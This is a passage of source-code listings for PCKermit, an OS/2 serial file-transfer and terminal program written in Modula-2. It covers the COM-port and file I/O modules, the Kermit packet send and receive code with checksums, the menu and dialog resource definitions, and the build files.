(commSt # 0C) THEN + RETURN TimeOut; + ELSE + status := DosWrite(Handle[portnum], ADR(ch), 1, wrote); + IF (status # 0) OR (wrote # 1) THEN + RETURN TimeOut; + ELSE + RETURN Success; + END; + END; + END SendChar; + + +BEGIN (* module initialization *) + (* nothing open yet *) + FOR pn := 0 TO 3 DO + Handle[pn] := 0; + BufStart[pn] := NIL; + BufLimit[pn] := NIL; + BufIn[pn] := NIL; + BufOut[pn] := NIL; + BufSize[pn] := 0; + END; +END CommPort. + + +[LISTING THIRTEEN] + +IMPLEMENTATION MODULE Files; (* File I/O for Kermit *) + + FROM FileSystem IMPORT + File, Response, Delete, Lookup, Close, ReadNBytes, WriteNBytes; + + FROM Strings IMPORT + Append; + + FROM Conversions IMPORT + CardToString; + + FROM SYSTEM IMPORT + ADR, SIZE; + + + TYPE + buffer = ARRAY [1..512] OF CHAR; + + + VAR + ext : CARDINAL; (* new file extensions to avoid name conflict *) + inBuf, outBuf : buffer; + inP, outP : CARDINAL; (* buffer pointers *) + read, written : CARDINAL; (* number of bytes read or written *) + (* by ReadNBytes or WriteNBytes *) + + + PROCEDURE Open (VAR f : File; name : ARRAY OF CHAR) : Status; + (* opens an existing file for reading, returns status *) + BEGIN + Lookup (f, name, FALSE); + IF f.res = done THEN + inP := 0; read := 0; + RETURN Done; + ELSE + RETURN Error; + END; + END Open; + + + PROCEDURE Create (VAR f : File; name : ARRAY OF CHAR) : Status; + (* creates a new file for writing, returns status *) + + VAR + ch : CHAR; + str : ARRAY [0..3] OF CHAR; + i : CARDINAL; + b : BOOLEAN; + + BEGIN + LOOP + Lookup (f, name, FALSE); (* check to see if file exists *) + IF f.res = done THEN + Close (f); + (* Filename Clash: Change file name *) + IF ext > 99 THEN (* out of new names... *) + RETURN Error; + END; + i := 0; + WHILE (name[i] # 0C) AND (name[i] # '.') DO + INC (i); (* scan for end of filename *) + END; + name[i] := '.'; name[i + 1] := 'K'; name[i + 2] := 0C; + i := 0; + CardToString (ext, 1, str, i, b); + Append (name, str); (* append new extension *) + INC (ext); + ELSE + EXIT; + END; + END; + Lookup (f, name, TRUE); + IF f.res = done THEN + outP := 0; + RETURN Done; + ELSE + RETURN Error; + END; + END Create; + + + PROCEDURE CloseFile (VAR f : File; Which : FileType) : Status; + (* closes a file after reading or writing *) + BEGIN + written := outP; + IF (Which = Output) AND (outP > 0) THEN + WriteNBytes (f, ADR (outBuf), outP); + written := f.count; + END; + Close (f); + IF (written = outP) AND (f.res = done) THEN + RETURN Done; + ELSE + RETURN Error; + END; + END CloseFile; + + + PROCEDURE Get (VAR f : File; VAR ch : CHAR) : Status; + (* Reads one character from the file, returns status *) + BEGIN + IF inP = read THEN + ReadNBytes (f, ADR (inBuf), SIZE (inBuf)); + read := f.count; + inP := 0; + END; + IF read = 0 THEN + RETURN EOF; + ELSE + INC (inP); + ch := inBuf[inP]; + RETURN Done; + END; + END Get; + + + PROCEDURE Put (ch : CHAR); + (* Writes one character to the file buffer *) + BEGIN + INC (outP); + outBuf[outP] := ch; + END Put; + + + PROCEDURE DoWrite (VAR f : File) : Status; + (* Writes buffer to disk only if nearly full *) + BEGIN + IF outP < 400 THEN (* still room in buffer *) + RETURN Done; + ELSE + WriteNBytes (f, ADR (outBuf), outP); + written := f.count; + IF (written = outP) AND (f.res = done) THEN + outP := 0; + RETURN Done; + ELSE + RETURN Error; + END; + END; + END DoWrite; + +BEGIN (* module initialization *) + ext := 0; +END Files. + + + + +[LISTING FOURTEEN] + +DEFINITION MODULE KH; + +CONST + ID_OK = 25; + + PARITY_OFF = 150; + ID_NONE = 152; + ID_ODD = 151; + ID_EVEN = 150; + + STOP_OFF = 140; + ID_STOP2 = 142; + ID_STOP1 = 141; + + DATA_OFF = 130; + ID_DATA8 = 138; + ID_DATA7 = 137; + + BAUD_OFF = 120; + ID_B19K2 = 128; + ID_B9600 = 127; + ID_B4800 = 126; + ID_B2400 = 125; + ID_B1200 = 124; + ID_B600 = 123; + ID_B300 = 122; + ID_B150 = 121; + ID_B110 = 120; + + COM_OFF = 100; + ID_COM2 = 101; + ID_COM1 = 100; + + IDM_C2 = 24; + IDM_C1 = 23; + IDM_AMBER = 22; + IDM_GREEN = 21; + IDM_WHITE = 20; + IDM_COLORS = 19; + IDM_DIREND = 18; + ID_DIRPATH = 17; + ID_SENDFN = 16; + IDM_DIRPATH = 15; + IDM_SENDFN = 14; + IDM_TERMHELP = 13; + IDM_HELPMENU = 12; + IDM_ABOUT = 11; + IDM_PARITY = 10; + IDM_STOPBITS = 9; + IDM_DATABITS = 8; + IDM_BAUDRATE = 7; + IDM_COMPORT = 6; + IDM_QUIT = 5; + IDM_REC = 4; + IDM_SEND = 3; + IDM_CONNECT = 2; + IDM_DIR = 1; + IDM_OPTIONS = 52; + IDM_FILE = 51; + IDM_KERMIT = 50; + +END KH. + + +[LISTING FIFTEEN] + +IMPLEMENTATION MODULE KH; +END KH. + + +[LISTING SIXTEEN] + +#define IDM_KERMIT 50 +#define IDM_FILE 51 +#define IDM_OPTIONS 52 +#define IDM_HELP 0 +#define IDM_DIR 1 +#define IDM_CONNECT 2 +#define IDM_SEND 3 +#define IDM_REC 4 +#define IDM_QUIT 5 +#define IDM_COMPORT 6 +#define IDM_BAUDRATE 7 +#define IDM_DATABITS 8 +#define IDM_STOPBITS 9 +#define IDM_PARITY 10 +#define IDM_ABOUT 11 +#define IDM_HELPMENU 12 +#define IDM_TERMHELP 13 +#define IDM_SENDFN 14 +#define IDM_DIRPATH 15 +#define ID_SENDFN 16 +#define ID_DIRPATH 17 +#define IDM_DIREND 18 +#define IDM_COLORS 19 +#define IDM_WHITE 20 +#define IDM_GREEN 21 +#define IDM_AMBER 22 +#define IDM_C1 23 +#define IDM_C2 24 +#define ID_OK 25 +#define ID_COM1 100 +#define ID_COM2 101 +#define ID_B110 120 +#define ID_B150 121 +#define ID_B300 122 +#define ID_B600 123 +#define ID_B1200 124 +#define ID_B2400 125 +#define ID_B4800 126 +#define ID_B9600 127 +#define ID_B19K2 128 +#define ID_DATA7 137 +#define ID_DATA8 138 +#define ID_STOP1 141 +#define ID_STOP2 142 +#define ID_EVEN 150 +#define ID_ODD 151 +#define ID_NONE 152 + + +[LISTING SEVENTEEN] + +IMPLEMENTATION MODULE DataLink; (* Sends and Receives Packets for PCKermit *) + + FROM ElapsedTime IMPORT + StartTime, GetTime; + + FROM Screen IMPORT + ClrScr, WriteString, WriteLn; + + FROM OS2DEF IMPORT + HIWORD, LOWORD; + + FROM PMWIN IMPORT + MPARAM, MPFROM2SHORT, WinPostMsg; + + FROM Shell IMPORT + ChildFrameWindow, comport; + + FROM CommPort IMPORT + CommStatus, GetChar, SendChar; + + FROM PAD IMPORT + PacketType, yourNPAD, yourPADC, yourEOL; + + FROM KH IMPORT + COM_OFF; + + FROM SYSTEM IMPORT + BYTE; + + IMPORT ASCII; + + + CONST + MAXtime = 100; (* hundredths of a second -- i.e., one second *) + MAXsohtrys = 100; + DL_BadCS = 1; + DL_NoSOH = 2; + + + TYPE + SMALLSET = SET OF [0..7]; (* BYTE *) + + VAR + ch : CHAR; + status : CommStatus; + + + PROCEDURE Delay (t : CARDINAL); + (* delay time in milliseconds *) + + VAR + tmp : LONGINT; + + BEGIN + tmp := t DIV 10; + StartTime; + WHILE GetTime() < tmp DO + END; + END Delay; + + + PROCEDURE ByteAnd (a, b : BYTE) : BYTE; + BEGIN + RETURN BYTE (SMALLSET (a) * SMALLSET (b)); + END ByteAnd; + + + PROCEDURE Char (c : INTEGER) : CHAR; + (* converts a number 0-95 into a printable character *) + BEGIN + RETURN (CHR (CARDINAL (ABS (c) + 32))); + END Char; + + + PROCEDURE UnChar (c : CHAR) : INTEGER; + (* converts a character into its corresponding number *) + BEGIN + RETURN (ABS (INTEGER (ORD (c)) - 32)); + END UnChar; + + + PROCEDURE FlushUART; + (* ensure no characters left in UART holding registers *) + BEGIN + Delay (500); + REPEAT + status := GetChar (comport - COM_OFF, ch); + UNTIL status = NoCharacter; + END FlushUART; + + + PROCEDURE SendPacket (s : PacketType); + (* Adds SOH and CheckSum to packet *) + + VAR + i : CARDINAL; + checksum : INTEGER; + + BEGIN + Delay (10); (* give host a chance to catch its breath *) + FOR i := 1 TO yourNPAD DO + status := SendChar (comport - COM_OFF, yourPADC, FALSE); + END; + status := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + i := 1; + checksum := 0; + WHILE s[i] # 0C DO + INC (checksum, ORD (s[i])); + status := SendChar (comport - COM_OFF, s[i], FALSE); + INC (i); + END; + checksum := checksum + (INTEGER (BITSET (checksum) * {7, 6}) DIV 64); + checksum := INTEGER (BITSET (checksum) * {5, 4, 3, 2, 1, 0}); + status := SendChar (comport - COM_OFF, Char (checksum), FALSE); + IF yourEOL # 0C THEN + status := SendChar (comport - COM_OFF, yourEOL, FALSE); + END; + END SendPacket; + + + PROCEDURE ReceivePacket (VAR r : PacketType) : BOOLEAN; + (* strips SOH and checksum -- returns status: TRUE = good packet *) + (* received; FALSE = timed out waiting for packet or checksum error *) + + VAR + sohtrys : INTEGER; + i, len : INTEGER; + ch : CHAR; + checksum : INTEGER; + mycheck, yourcheck : CHAR; + + BEGIN + sohtrys := MAXsohtrys; + REPEAT + StartTime; + REPEAT + status := GetChar (comport - COM_OFF, ch); + UNTIL (status = Success) OR (GetTime() > MAXtime); + ch := CHAR (ByteAnd (ch, 177C)); (* mask off MSB *) + (* skip over up to MAXsohtrys padding characters, *) + (* but allow only MAXsohtrys/10 timeouts *) + IF status = Success THEN + DEC (sohtrys); + ELSE + DEC (sohtrys, 10); + END; + UNTIL (ch = ASCII.soh) OR (sohtrys <= 0); + + IF ch = ASCII.soh THEN + (* receive rest of packet *) + StartTime; + REPEAT + status := GetChar (comport - COM_OFF, ch); + UNTIL (status = Success) OR (GetTime() > MAXtime); + ch := CHAR (ByteAnd (ch, 177C)); + len := UnChar (ch); + r[1] := ch; + checksum := ORD (ch); + i := 2; (* on to second character in packet -- after LEN *) + REPEAT + StartTime; + REPEAT + status := GetChar (comport - COM_OFF, ch); + UNTIL (status = Success) OR (GetTime() > MAXtime); + ch := CHAR (ByteAnd (ch, 177C)); + r[i] := ch; INC (i); + INC (checksum, (ORD (ch))); + UNTIL (i > len); + (* get checksum character *) + StartTime; + REPEAT + status := GetChar (comport - COM_OFF, ch); + UNTIL (status = Success) OR (GetTime() > MAXtime); + ch := CHAR (ByteAnd (ch, 177C)); + yourcheck := ch; + r[i] := 0C; + checksum := checksum + + (INTEGER (BITSET (checksum) * {7, 6}) DIV 64); + checksum := INTEGER (BITSET (checksum) * {5, 4, 3, 2, 1, 0}); + mycheck := Char (checksum); + IF mycheck = yourcheck THEN (* checksum OK *) + RETURN TRUE; + ELSE (* ERROR!!! *) + WinPostMsg (ChildFrameWindow, WM_DL, + MPFROM2SHORT (DL_BadCS, 0), 0); + RETURN FALSE; + END; + ELSE + WinPostMsg (ChildFrameWindow, WM_DL, + MPFROM2SHORT (DL_NoSOH, 0), 0); + RETURN FALSE; + END; + END ReceivePacket; + + + PROCEDURE DoDLMsg (mp1, mp2 : MPARAM); + (* Process DataLink Messages *) + BEGIN + CASE LOWORD (mp1) OF + DL_BadCS: + WriteString ("Bad Checksum"); WriteLn; + | DL_NoSOH: + WriteString ("No SOH"); WriteLn; + ELSE + (* Do Nothing *) + END; + END DoDLMsg; + +END DataLink. + + +[LISTING EIGHTEEN] + +#include +#include "pckermit.h" + +ICON IDM_KERMIT pckermit.ico + +MENU IDM_KERMIT + BEGIN + SUBMENU "~File", IDM_FILE + BEGIN + MENUITEM "~Directory...", IDM_DIR + MENUITEM "~Connect\t^C", IDM_CONNECT + MENUITEM "~Send...\t^S", IDM_SEND + MENUITEM "~Receive...\t^R", IDM_REC + MENUITEM SEPARATOR + MENUITEM "E~xit\t^X", IDM_QUIT + MENUITEM "A~bout PCKermit...", IDM_ABOUT + END + + SUBMENU "~Options", IDM_OPTIONS + BEGIN + MENUITEM "~COM port...", IDM_COMPORT + MENUITEM "~Baud rate...", IDM_BAUDRATE + MENUITEM "~Data bits...", IDM_DATABITS + MENUITEM "~Stop bits...", IDM_STOPBITS + MENUITEM "~Parity bits...", IDM_PARITY + END + + SUBMENU "~Colors", IDM_COLORS + BEGIN + MENUITEM "~White Mono", IDM_WHITE + MENUITEM "~Green Mono", IDM_GREEN + MENUITEM "~Amber Mono", IDM_AMBER + MENUITEM "Full Color ~1", IDM_C1 + MENUITEM "Full Color ~2", IDM_C2 + END + + MENUITEM "F1=Help", IDM_HELP, MIS_HELP | MIS_BUTTONSEPARATOR + END + +ACCELTABLE IDM_KERMIT + BEGIN + "^C", IDM_CONNECT + "^S", IDM_SEND + "^R", IDM_REC + "^X", IDM_QUIT + END + +DLGTEMPLATE IDM_COMPORT LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_COMPORT, 129, 91, 143, 54, FS_NOBYTEALIGN | FS_DLGBORDER | + WS_VISIBLE | WS_CLIPSIBLINGS | WS_SAVEBITS + BEGIN + CONTROL "Select COM Port", IDM_COMPORT, 10, 9, 83, 38, + WC_STATIC, SS_GROUPBOX | WS_VISIBLE + CONTROL "COM1", ID_COM1, 30, 25, 43, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_GROUP | WS_TABSTOP | WS_VISIBLE + CONTROL "COM2", ID_COM2, 30, 15, 39, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "OK", ID_OK, 101, 10, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + BS_DEFAULT | WS_GROUP | WS_TABSTOP | WS_VISIBLE + END +END + +DLGTEMPLATE IDM_BAUDRATE LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_BAUDRATE, 131, 54, 142, 115, FS_NOBYTEALIGN | + FS_DLGBORDER | WS_VISIBLE | WS_CLIPSIBLINGS | WS_SAVEBITS + BEGIN + CONTROL "Select Baud Rate", IDM_BAUDRATE, 8, 6, 85, 107, + WC_STATIC, SS_GROUPBOX | WS_VISIBLE + CONTROL "110 Baud", ID_B110, 20, 90, 62, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_GROUP | WS_TABSTOP | WS_VISIBLE + CONTROL "150 Baud", ID_B150, 20, 80, 57, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "300 Baud", ID_B300, 20, 70, 58, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "600 Baud", ID_B600, 20, 60, 54, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "1200 Baud", ID_B1200, 20, 50, 59, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "2400 Baud", ID_B2400, 20, 40, 63, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "4800 Baud", ID_B4800, 20, 30, 62, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "9600 Baud", ID_B9600, 20, 20, 59, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "19,200 Baud", ID_B19K2, 20, 10, 69, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "OK", ID_OK, 100, 8, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + BS_DEFAULT | WS_GROUP | WS_TABSTOP | WS_VISIBLE + END +END + +DLGTEMPLATE IDM_DATABITS LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_DATABITS, 137, 80, 140, 56, FS_NOBYTEALIGN | + FS_DLGBORDER | WS_VISIBLE | WS_SAVEBITS + BEGIN + CONTROL "Select Data Bits", IDM_DATABITS, 8, 11, 80, 36, + WC_STATIC, SS_GROUPBOX | WS_VISIBLE + CONTROL "7 Data Bits", ID_DATA7, 15, 25, 67, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_GROUP | WS_TABSTOP | WS_VISIBLE + CONTROL "8 Data Bits", ID_DATA8, 15, 15, 64, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "OK", ID_OK, 96, 12, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + BS_DEFAULT | WS_GROUP | WS_TABSTOP | WS_VISIBLE + END +END + +DLGTEMPLATE IDM_STOPBITS LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_STOPBITS, 139, 92, 140, 43, FS_NOBYTEALIGN | + FS_DLGBORDER | WS_VISIBLE | WS_SAVEBITS + BEGIN + CONTROL "Select Stop Bits", IDM_STOPBITS, 9, 6, 80, 32, + WC_STATIC, SS_GROUPBOX | WS_VISIBLE + CONTROL "1 Stop Bit", ID_STOP1, 20, 20, 57, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_GROUP | WS_TABSTOP | WS_VISIBLE + CONTROL "2 Stop Bits", ID_STOP2, 20, 10, 60, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "OK", ID_OK, 96, 8, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + BS_DEFAULT | WS_GROUP | WS_TABSTOP | WS_VISIBLE + END +END + +DLGTEMPLATE IDM_PARITY LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_PARITY, 138, 84, 134, 57, FS_NOBYTEALIGN | FS_DLGBORDER | + WS_VISIBLE | WS_SAVEBITS + BEGIN + CONTROL "Select Parity", IDM_PARITY, 12, 6, 64, 46, WC_STATIC, + SS_GROUPBOX | WS_VISIBLE + CONTROL "Even", ID_EVEN, 25, 30, 40, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_GROUP | WS_TABSTOP | WS_VISIBLE + CONTROL "Odd", ID_ODD, 25, 20, 38, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "None", ID_NONE, 25, 10, 40, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "OK", ID_OK, 88, 8, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + BS_DEFAULT | WS_GROUP | WS_TABSTOP | WS_VISIBLE + END +END + + +DLGTEMPLATE IDM_ABOUT LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_ABOUT, 93, 74, 229, 88, FS_NOBYTEALIGN | FS_DLGBORDER | + WS_VISIBLE | WS_SAVEBITS + BEGIN + ICON IDM_KERMIT -1, 12, 64, 22, 16 + CONTROL "PCKermit for OS/2", 256, 67, 70, 82, 8, WC_STATIC, + SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "Copyright (c) 1990 by Brian R. Anderson", 257, 27, 30, 172, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "Microcomputer to Mainframe Communications", 259, 13, 50, 199, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL " OK ", 258, 88, 10, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + BS_DEFAULT | WS_TABSTOP | WS_VISIBLE + END +END + +DLGTEMPLATE IDM_HELPMENU LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_HELPMENU, 83, 45, 224, 125, FS_NOBYTEALIGN | FS_DLGBORDER | + WS_VISIBLE | WS_CLIPSIBLINGS | WS_SAVEBITS + BEGIN + ICON IDM_KERMIT -1, 14, 99, 21, 16 + CONTROL "PCKermit Help Menu", 256, 64, 106, 91, 8, WC_STATIC, + SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "set communications Options .................. Alt, O", + 258, 10, 80, 201, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "Connect to Host ................................... Alt, F; C", + 259, 10, 70, 204, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "Directory .............................................. Alt, F; D", + 260, 10, 60, 207, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "Send a File .......................................... Alt, F; S", + 261, 10, 50, 207, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "Receive a File ...................................... Alt, F; R", + 262, 10, 40, 209, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "Exit ...................................................... Alt, F; X", + 263, 10, 30, 205, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "OK", 264, 83, 9, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + WS_TABSTOP | WS_VISIBLE | BS_DEFAULT + END +END + +DLGTEMPLATE IDM_TERMHELP LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_TERMHELP, 81, 20, 238, 177, FS_NOBYTEALIGN | + FS_DLGBORDER | WS_VISIBLE | WS_CLIPSIBLINGS | WS_SAVEBITS + BEGIN + CONTROL "^E = Echo mode", 256, 10, 160, 72, 8, WC_STATIC, + SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "^L = Local echo mode", 257, 10, 150, 97, 8, WC_STATIC, + SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "^T = Terminal Mode (no echo)", 258, 10, 140, 131, 8, WC_STATIC, + SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "^N = Newline mode ( --> )", 259, 10, 130, 165, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "^O = Newline mode OFF", 260, 10, 120, 109, 8, WC_STATIC, + SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "Televideo TVI950 / IBM 7171 Terminal Emulation", 261, 10, 100, 217, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "Sh-F1 - Sh-F12 = PF1 - PF12", 262, 10, 90, 135, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "Home = Clear", 263, 10, 80, 119, 8, WC_STATIC, + SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "PgDn = Page Down (as used in PROFS)", + 264, 10, 70, 228, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "PgUp = Page Up (as used in PROFS)", + 265, 10, 60, 227, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "Insert = Insert (Enter to Clear)", 266, 10, 40, 221, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "Delete = Delete", 267, 10, 30, 199, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "Control-G = Reset (rewrites the screen)", 268, 10, 20, 222, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "Cursor Keys (i.e., Up, Down, Left, Right) all work.", + 269, 10, 10, 229, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "OK", 270, 193, 158, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + BS_DEFAULT | WS_TABSTOP | WS_VISIBLE + CONTROL "End = End (as used in PROFS)", 271, 10, 50, 209, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + END +END + + +DLGTEMPLATE IDM_SENDFN LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_SENDFN, 113, 90, 202, 60, FS_NOBYTEALIGN | FS_DLGBORDER | + WS_VISIBLE | WS_SAVEBITS + BEGIN + CONTROL "Send File", 256, 4, 4, 195, 24, WC_STATIC, SS_GROUPBOX | + WS_GROUP | WS_VISIBLE + CONTROL "Enter filename:", 257, 13, 11, 69, 8, WC_STATIC, SS_TEXT | + DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + ICON IDM_KERMIT -1, 15, 38, 22, 16 + CONTROL "PCKermit for OS/2", 259, 59, 45, 82, 8, WC_STATIC, SS_TEXT | + DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "OK", 260, 154, 36, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + WS_TABSTOP | WS_VISIBLE | BS_DEFAULT + CONTROL "", ID_SENDFN, 89, 10, 98, 8, WC_ENTRYFIELD, ES_LEFT | + ES_MARGIN | WS_TABSTOP | WS_VISIBLE + END +END + +DLGTEMPLATE IDM_DIRPATH LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_DIRPATH, 83, 95, 242, 46, FS_NOBYTEALIGN | FS_DLGBORDER | + WS_VISIBLE | WS_SAVEBITS + BEGIN + CONTROL "Directory", 256, 7, 5, 227, 24, WC_STATIC, SS_GROUPBOX | + WS_GROUP | WS_VISIBLE + CONTROL "Path:", 257, 28, 11, 26, 8, WC_STATIC, SS_TEXT | DT_LEFT | + DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "OK", 258, 185, 31, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + WS_TABSTOP | WS_VISIBLE | BS_DEFAULT + CONTROL "*.*", ID_DIRPATH, 57, 11, 166, 8, WC_ENTRYFIELD, ES_LEFT | + ES_AUTOSCROLL | ES_MARGIN | WS_TABSTOP | WS_VISIBLE + END +END + +DLGTEMPLATE IDM_DIREND LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_DIREND, 149, 18, 101, 27, FS_NOBYTEALIGN | FS_DLGBORDER | + WS_VISIBLE | WS_SAVEBITS + BEGIN + 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PAD.MOD DATALINK.SYM KH.SYM SHELL.SYM PMWIN.SYM COMMPORT.SYM - +FILES.SYM OS2DEF.SYM SCREEN.SYM PAD.SYM + M2 PAD.MOD/OUT:PAD.OBJ +DATALINK.OBJ: DATALINK.MOD KH.SYM PAD.SYM COMMPORT.SYM SHELL.SYM PMWIN.SYM - +OS2DEF.SYM SCREEN.SYM DATALINK.SYM + M2 DATALINK.MOD/OUT:DATALINK.OBJ +PCKERMIT.res: PCKERMIT.rc PCKERMIT.h PCKERMIT.ico + rc -r PCKERMIT.rc +PCKERMIT.EXE: OS2DEF.OBJ PMWIN.OBJ KH.OBJ PMAVIO.OBJ PMGPI.OBJ COMMPORT.OBJ - +PCKERMIT.OBJ SCREEN.OBJ FILES.OBJ SHELL.OBJ TERM.OBJ PAD.OBJ DATALINK.OBJ + LINK @PCKERMIT.LNK + rc PCKERMIT.res +PCKERMIT.exe: PCKERMIT.res + rc PCKERMIT.res + + +[FILE PCKERMIT.LNK] + +KH.OBJ+ +pckermit.OBJ+ +SCREEN.OBJ+ +COMMPORT.OBJ+ +FILES.OBJ+ +SHELL.OBJ+ +TERM.OBJ+ +PAD.OBJ+ +DATALINK.OBJ +pckermit +pckermit +PM+ +M2LIB+ +DOSCALLS+ +OS2 +pckermit.edf + + +[FILE PAD.MOD] + +IMPLEMENTATION MODULE PAD; (* Packet Assembler/Disassembler for Kermit *) + + FROM SYSTEM IMPORT + ADR; + + FROM Storage IMPORT + ALLOCATE, DEALLOCATE; + + FROM Screen IMPORT + ClrScr, WriteString, WriteInt, WriteHex, WriteLn; + + FROM OS2DEF IMPORT + HIWORD, LOWORD; + + FROM DosCalls IMPORT + ExitType, DosExit; + + FROM Strings IMPORT + Length, Assign; + + FROM FileSystem IMPORT + File; + + FROM Directories IMPORT + FileAttributes, AttributeSet, DirectoryEntry, FindFirst, FindNext; + + FROM Files IMPORT + Status, FileType, Open, Create, CloseFile, Get, Put, DoWrite; + + FROM PMWIN IMPORT + MPARAM, MPFROM2SHORT, WinPostMsg; + + FROM Shell IMPORT + ChildFrameWindow, comport; + + FROM KH IMPORT + COM_OFF; + + FROM DataLink IMPORT + FlushUART, SendPacket, ReceivePacket; + + FROM SYSTEM IMPORT + BYTE; + + IMPORT ASCII; + + + CONST + myMAXL = 94; + myTIME = 10; + myNPAD = 0; + myPADC = 0C; + myEOL = 0C; + myQCTL = '#'; + myQBIN = '&'; + myCHKT = '1'; (* one character checksum *) + MAXtrys = 5; + (* From DEFINITION MODULE: + PAD_Quit = 0; *) + PAD_SendPacket = 1; + PAD_ResendPacket = 2; + PAD_NoSuchFile = 3; + PAD_ExcessiveErrors = 4; + PAD_ProbClSrcFile = 5; + PAD_ReceivedPacket = 6; + PAD_Filename = 7; + PAD_RequestRepeat = 8; + PAD_DuplicatePacket = 9; + PAD_UnableToOpen = 10; + PAD_ProbClDestFile = 11; + PAD_ErrWrtFile = 12; + PAD_Msg = 13; + + + TYPE + (* From Definition Module: + PacketType = ARRAY [1..100] OF CHAR; + *) + SMALLSET = SET OF [0..7]; (* a byte *) + + + VAR + yourMAXL : INTEGER; (* maximum packet length -- up to 94 *) + yourTIME : INTEGER; (* time out -- seconds *) 